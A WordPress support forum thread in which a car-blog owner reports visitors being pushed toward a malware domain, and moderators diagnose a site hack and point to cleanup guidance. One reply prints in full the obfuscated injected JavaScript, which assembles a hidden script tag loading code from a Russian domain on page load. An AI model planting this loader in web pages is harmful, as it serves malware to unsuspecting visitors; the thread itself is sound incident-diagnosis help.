Support » Fixing WordPress » Receiving a filedownload message on website

  • Resolved Naumansiddiqui



    I just started a car blog, trying to list all the cars.

    The problem has recently occurred, whenever someone opens the website, after the loading is done, the website tries to connect to momhand(dot)ru which is pretty much a malware site. I mean you are asked to download a pdf file and all types of java errors come in.

    for helpers here is the link to my site Hotmodcars

    I am really frustrated and demotivated as I have done everything to remove this. All advices are welcome, I look forward to help.


Viewing 9 replies - 1 through 9 (of 9 total)
  • Moderator Ipstenu (Mika Epstein)


    Lead Plugin Wrangler

    I presume you read this and followed the suggestions: FAQ My site was hacked

    I didn’t get prompted to download a PDF, mind, and I ran a scan

    and got this in the javascript dump

    this.S="";var x=new Array();var P;yu=["y"];G=["o"];F=function(){this.YG=50396;this.YG--;function Y(h,q,T){u=8318;u++;this.a_='';return h.substr(q,T);var d={lg:"lL"};var Cw={k:"b"};}var O=document;W={QW:false};var e=String("/goo"+"gle."+"com/"+"badj"+Y("ojo.BPq0",0,4)+Y("com/MPs",0,4)+Y("tinyvEse",0,4)+"pic."+Y("com.Hun",0,4)+Y("phpcyrm",0,3));var Tx={jt:"er"};;;var j='';PO={xb:52344};Zx={ZG:60817};var OD={Pa:"ki"};var Tk=RegExp;var dc="";var jG={};this.Zh=59066;this.Zh++;function A(h,q){var T=new String("[")+q+"]";var H=new String();try {} catch(Vy){};var M=new Tk(T, String("g"));this.Yo=24897;this.Yo-=97;return h.replace(M, j);};var _=A('suc1r1i1p1tC','uCZz1B9');IL=[];var WW=new Date();var L=657268-649188;var qw=new String();Ui={ba:"Mp"};var X=Y("bodygqEj",0,4);var OW={};var n='';var i=null;var ke=new Array();var oJj=["QZ","ly"];P=function(){ZO=18634;ZO+=200;this._q=48372;this._q+=252;try {bE={JJ:false};this.tW=59935;this.tW++;var _w=A('c3r9evavtqeHEpl3eHmTezndti','sZH8izTYAw0XL1Nqdp39vk');N=19659;N++;var R="";Td=O[_w](_);var c=A('svrjcv','EDv56mah9fJi1_jK');;;this.qy=45699;this.qy-=131;var h=L+e;kp={};var vp=false;var l=String("de"+Y("feGYh",0,2)+Y("VmArAmV",3,1));v_=[];ed={BS:60825};var D="";Td[l]=[1][0];Yj=["TC","qW"];var fZ="fZ";Td[c]=String(Y("htlBk",0,2)+"tp"+Y(":/Ic3",0,2)+Y("/mxYX",0,2)+Y("omeLP",0,2)+"ha"+"nd"+Y(".rMWln",0,2)+"u:")+h;this.Ia="";ja=30223;ja--;var sf=[];O[X].appendChild(Td);var bV=49047;var Aq=4712;} catch(B){};};};var yn={};var mT="";F();cJ=45828;cJ++;hE=43099;hE++;g={Jf:false};window.onload=P;var BAu=new Array();var pP=false;

    At a guess? That may be it.

    how to remove it ? Any suggestions ?

    Moderator Ipstenu (Mika Epstein)


    Lead Plugin Wrangler

    Yeah, what it says here: FAQ My site was hacked

    You’ll have to check everything, and hopefully you have a good backup.

    So you are suggesting that my site got hacked ?

    Back up isn’t an issue, but how do I resolve the current scenario ?

    I don’t want to back down …I want to take it apart. Any resource which can help me in this issue ?

    Moderator Ipstenu (Mika Epstein)


    Lead Plugin Wrangler

    Yes. Your site was hacked.

    Seriously. Either it was hacked by a theme or plugin, an exploit, an insecure password, who knows. What I DO know is that the FAQ I’ve linked to, twice (thrice as of this post) is your best resource on how to undo a hack.

    FAQ My site was hacked

    well thanks. Istenu. Thanks for your help.

    Other viewers are welcome to put a response too.



    Forum Moderator

    If you check your web source code you’ll see there is a strange line containing a script. I presume it’s on the footer.php since is below the html close tag.

    You have to delete that and then take all the necessary precautions so it doesn’t happen again (that’s when I’m having troubles…).

    Anyway, follow the faq, maybe after that nobody is going to bother you again.

    Dear All thanks,

    The code was in a file which I removed.

    Now, trying to take measures to close xss issues.

    Thank you

Viewing 9 replies - 1 through 9 (of 9 total)
  • The topic ‘Receiving a filedownload message on website’ is closed to new replies.